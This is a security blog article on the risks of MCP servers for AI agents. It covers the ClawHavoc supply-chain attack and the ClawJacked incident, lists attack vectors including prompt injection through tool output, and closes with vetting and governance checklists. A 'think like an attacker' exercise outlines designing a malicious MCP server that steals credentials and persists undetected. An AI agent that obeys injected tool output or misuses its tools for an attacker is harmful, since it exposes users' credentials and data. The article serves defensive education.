In early 2026, a supply chain attack called ClawHavoc targeted users of the OpenClaw AI agent platform through its community skill repository. Malicious packages disguised as trading bots and developer utilities deployed information-stealing malware the moment they were installed. The attack vector was MCP — Model Context Protocol — the standard that connects AI agents to external tools and services. Most developers integrating MCP servers into their AI applications have never security-reviewed them. My breakdown of why this is the next major attack surface, what’s already been exploited, and what you need to check right now.
What You’ll Learn
What MCP servers are and how they extend AI agent capabilities
The specific security risks unvetted MCP servers introduce
The ClawHavoc case and what it teaches about MCP supply chain attacks
MCP server security is the component of agentic AI security that most developers don’t think about until they’ve already deployed something vulnerable. MCP security sits at the intersection of agentic AI security and the AI supply chain attack landscape. My coverage of OWASP LLM05 (Supply Chain) in the OWASP AI Top 10 describes the category — my focus here is MCP specifically.
What MCP Servers Are
MCP — Model Context Protocol — is the open standard developed by Anthropic that defines how AI models connect to external tools, data sources, and services. My one-sentence summary for security teams: MCP is the mechanism that gives an AI agent hands. Without MCP, an AI can only produce text. With MCP, it can take actions in the real world. That distinction is the entire basis for the security concern. An MCP server is a piece of software that exposes a set of tools to an AI model through the MCP protocol. The AI can then call those tools as part of completing a task. Claude Code uses MCP servers to give Claude access to file systems, APIs, databases, and custom tools.
MCP ARCHITECTURE — SECURITY CONTEXT
# How MCP works
AI model ← MCP protocol → MCP server → external tool/service/data
AI sees: a list of available tools with descriptions
AI calls: a tool by name with parameters
MCP server: executes the actual action and returns result
# What MCP servers can expose
File system access (read, write, delete)
Shell/terminal execution
API integrations (Slack, GitHub, Jira, Salesforce)
Database queries
Web browsing and scraping
# Why this is a security-critical component
MCP server code runs with OS-level permissions on the host machine
Malicious MCP server = attacker code with AI-level permissions
The MCP Attack Surface
My security concern with MCP is specifically the combination of two factors: most MCP servers are open-source packages downloaded and deployed with minimal security review, and they execute with the full permissions of the AI agent — which as I described in the agentic AI security guide, are often much broader than they should be.
MCP ATTACK VECTORS
# Attack 1: Malicious MCP server (supply chain)
Attacker publishes a useful-looking MCP server on npm/GitHub
Developer installs it → attacker code runs with AI agent permissions
Impact: credential theft, data exfiltration, persistence on developer machine
# Attack 2: Compromised legitimate MCP server
Popular MCP server is maintained by a single developer
Attacker takes over maintainer account → publishes malicious update
All users auto-update → mass deployment of attacker code
# Attack 3: Prompt injection via MCP tool output
MCP tool fetches external data (web page, database record)
Attacker embeds injection payload in that data
AI receives tool output containing hidden instructions → follows them
# Attack 4: Overprivileged MCP tool exploitation
MCP server has file system + shell access + network access
Via prompt injection: attacker directs AI to use these tools maliciously
No separate exploitation needed — the legitimate tool IS the attack vector
ClawHavoc — The MCP Supply Chain Attack
ClawHavoc is the most instructive MCP supply chain attack to date. My analysis of the IBM X-Force report (April 2026): the attack is essentially identical to the npm supply chain attack pattern — but targeted at the AI agent ecosystem rather than the traditional developer ecosystem. The same developer habits that make npm supply chain attacks work (trust the package repository, install recommended packages) make MCP supply chain attacks work.
CLAWHAVOC — ATTACK ANALYSIS
# What happened
Platform targeted: OpenClaw AI agent (community skill repository — ClawHub)
Method: malicious skills disguised as trading bots, utilities, development helpers
Payload: information-stealing malware deployed on developer machines at install
Source: IBM X-Force analysis, April 2026
# How it avoided detection
Skills appeared functional — they did what they advertised
Malicious code was in the install/setup phase, not the runtime behaviour
Community skill repositories had less security scrutiny than npm/PyPI
# The parallel to ClawJacked (separate incident)
Researchers at Oasis Security found: malicious websites could brute-force local OpenClaw
Allowed silent data exfiltration via the agent’s built-in autonomy
Patched in OpenClaw version 2026.2.26
EXERCISE — SECURITY REVIEW (15 MIN)
Vet an MCP Server Before Deployment
Pick any MCP server from the Anthropic MCP directory or a GitHub search.
Apply my vetting checklist:
1. PUBLISHER VERIFICATION
Who published this? Individual or organisation?
How old is the account? Any other published packages?
Is there a security disclosure policy?
2. CODE REVIEW (5 minutes)
Read the package.json / setup.py — what dependencies does it pull in?
Check the install/postinstall scripts — do they run anything unexpected?
Search the code for: fetch(), exec(), spawn(), eval(), child_process
Does it make any network requests outside its stated purpose?
3. PERMISSIONS REVIEW
What OS permissions does this MCP server request?
Does it need all of them for its stated function?
Does it request file system access when it claims to be an API wrapper?
4. POPULARITY AND MAINTENANCE
How many GitHub stars / npm downloads?
When was the last commit?
Are there open security issues?
5. VERDICT
Would you deploy this MCP server in a production environment?
If yes: what constraints would you apply to limit blast radius?
✅ The install script check (step 2) is the most important part of MCP vetting. Malicious supply chain packages most commonly execute their payload during npm install, not during runtime — because install happens with elevated privileges and before any security monitoring is active. A legitimate MCP server for Slack integration has no reason to run shell commands during installation. Any postinstall script that does more than build native modules is a red flag worth investigating before proceeding.
MCP Security Governance
MCP SECURITY GOVERNANCE FRAMEWORK
# For development teams
Maintain an approved MCP server list — no unapproved servers in production
Security review before adding any new MCP server (use checklist above)
Pin MCP server versions — no auto-updates without review
Principle of least privilege — disable MCP tools the AI doesn’t need for each task
# For enterprise AI deployments
Centralise MCP server management — individual developers don’t add their own
Network egress monitoring for MCP servers — alert on unexpected external connections
Sandbox MCP execution — limit what MCP server processes can access on the host
Incident response plan for compromised MCP server — who gets notified, what’s revoked
# The minimum viable MCP security posture (for individuals)
Only install MCP servers from GitHub repositories you can read and understand
Check the package.json postinstall script before running npm install
Pin to a specific commit hash, not a floating version tag
Review any MCP server update before applying it — treat updates as new installs
If a tool requests more permissions than its description justifies: do not install
The Current MCP Security Landscape
My assessment of where the MCP security ecosystem sits in May 2026 — and this is based on the incident data, not predictions: it’s in approximately the same position as the npm ecosystem was in 2018 — growing fast, widely trusted, and almost completely lacking in systematic security vetting practices. The incidents are starting. The tooling to detect and prevent them is immature. And developer adoption is outpacing security awareness by a significant margin.
MCP SECURITY LANDSCAPE — MAY 2026
# What’s documented
ClawHavoc: supply chain attack via AI skill repository (early 2026)
ClawJacked: website-to-agent attack via local OpenClaw instances (patched Feb 2026)
Approximately 15,000 CVEs disclosed in 2026 to date — dozens impact AI systems
Dark Reading, IBM X-Force, Oasis Security all publishing MCP vulnerability research in 2026
# What’s missing
No centralised security scanning for MCP servers equivalent to npm audit
No standardised permission disclosure format for MCP servers
No widely adopted MCP server security review checklist pre-2026
Most community MCP registries have less security scrutiny than PyPI or npm
# What’s emerging
Anthropic: working on MCP security guidelines and server verification standards
Security vendors: adding MCP server scanning to supply chain security products
Wiz, Snyk, Socket.dev: all building MCP-aware security tooling in 2026
EXERCISE — THINK LIKE AN ATTACKER (10 MIN)
Design a Malicious MCP Server Attack
For educational understanding of the threat — designing the attack teaches you what to look for.
SCENARIO: You want to target developers using AI coding agents.
1. PACKAGE DESIGN
What would you name your malicious MCP server to attract installs?
(Think about what developers are searching for when integrating AI)
What legitimate functionality would it provide as cover?
2. PAYLOAD DELIVERY
Where in the package lifecycle would you execute your malicious code?
(install, import, first use, after X days?)
Why that timing?
3. WHAT YOU’D STEAL
What data does a developer’s machine typically have that’s valuable?
(Think: .env files, SSH keys, git credentials, AWS credentials, browser passwords)
4. PERSISTENCE
How would you maintain access after initial compromise?
How would you avoid detection?
5. DEFENCE IMPLICATION
What specific check in the MCP vetting process would have caught this?
(This is the key insight — attacker design teaches defender priorities)
✅ The timing insight (question 2) is what developers most commonly miss: malicious supply chain packages almost always execute in the install/postinstall phase, not at runtime. This is because install runs before any security monitoring is active, often with elevated privileges, and the developer is watching the terminal output anyway — they don’t notice one extra script running. The defence: check postinstall scripts in package.json before running npm install. Any postinstall that runs curl, wget, node -e, or shell commands on an MCP server that claims to be a simple API wrapper is a red flag.
MCP Security — Key Points
MCP servers execute with AI agent permissions — compromised MCP = attacker code with those permissions
ClawHavoc (early 2026): malicious AI skills deployed info-stealing malware via supply chain
Vetting checklist: publisher, install scripts, permissions, network requests, maintenance status
Governance: approved list + version pinning + least privilege + egress monitoring
MCP Server Security — Your Next Step
Audit every MCP server currently deployed in your environment against the vetting checklist. My estimate from the assessments I run: most organisations using AI agents have 3–8 MCP servers deployed, and fewer than half have been through any security review. The checklist above takes 20–30 minutes per server. For a typical deployment, that’s 2 hours of work that significantly reduces your AI agent attack surface. Version-pin them all before this week is out. The two minutes that takes now is worth considerably more than the incident response exercise you’d otherwise be running.
Quick Check
A developer finds an MCP server on GitHub that perfectly integrates their AI agent with their internal database. It has 40 stars and was published 3 weeks ago by an account created 2 months ago. Should they deploy it?
Frequently Asked Questions
What is an MCP server?
An MCP (Model Context Protocol) server is software that exposes a set of tools to an AI model through Anthropic’s Model Context Protocol standard. The AI can call these tools to take actions beyond generating text — accessing files, querying databases, calling APIs, executing code, and interacting with external services. MCP servers are how AI coding agents like Claude Code gain the ability to read and write files, run commands, and interact with development tools.
What was the ClawHavoc attack?
ClawHavoc was a supply chain malware campaign targeting users of the OpenClaw AI agent platform in early 2026. Attackers published malicious packages to the ClawHub community skill repository, disguised as legitimate utilities including trading bots and development helpers. When users installed these packages, information-stealing malware was deployed on their machines. The attack was documented by IBM X-Force in April 2026. My reading of the significance: it represents the first large-scale supply chain attack specifically targeting the AI agent ecosystem, and it succeeded because developers trusted the community repository with the same uncritical instinct they use for npm packages.
How do I vet an MCP server before using it?
Check the publisher’s account age and history. Read the install scripts for unexpected commands. Review all dependencies. Search the code for network requests outside the stated purpose. Verify every permission the server requests is necessary for its function. Check the maintenance history — abandoned packages with recent updates warrant extra scrutiny. For any MCP server with file system, shell, or database access, a full code review before deployment is the minimum standard.
← Related
Agentic AI Security 2026
Next →
PROMPTFLUX — AI Malware That Queries LLMs
Further Reading
Agentic AI Security 2026— The broader context for MCP risks. How agentic AI creates the attack surface that malicious MCP servers exploit, with the CyberStrikeAI incident and defensive framework.
Vibe Coding Security Risks— The development practices that compound MCP risk. Developers deploying unvetted MCP servers as part of rapid AI-assisted development are combining two supply chain risk factors simultaneously.
OWASP AI Security Top 10— LLM05 (Supply Chain) is the OWASP category covering MCP server risk. The full framework with defences for all ten categories.
Model Context Protocol — Official Docs— Anthropic’s official MCP architecture documentation. The definitive reference for understanding what MCP servers can and cannot do, with security considerations in the architecture section.
IBM X-Force — Agentic AI Vulnerabilities 2026— The IBM X-Force analysis covering ClawHavoc, ClawJacked, and the broader pattern of vulnerabilities emerging in the agentic AI ecosystem in 2026.
ME
Mr Elite
Owner, SecurityElites.com
My concern about MCP security is identical to my concern about npm security five years ago — and the npm ecosystem took years and multiple high-profile incidents to develop adequate security practices. I worry the MCP ecosystem is on the same trajectory, except the blast radius when a malicious MCP server is deployed is larger, because it runs inside an AI agent with permissions that no typical npm package has. My advice: treat every MCP server you deploy with the same due diligence you’d give a third-party library running in your production authentication system. Because in many deployments, that’s effectively what it is.
Founder of Securityelites and creator of the SE-ARTCP credential. Working penetration tester focused on AI red team, prompt injection research, and LLM security education.
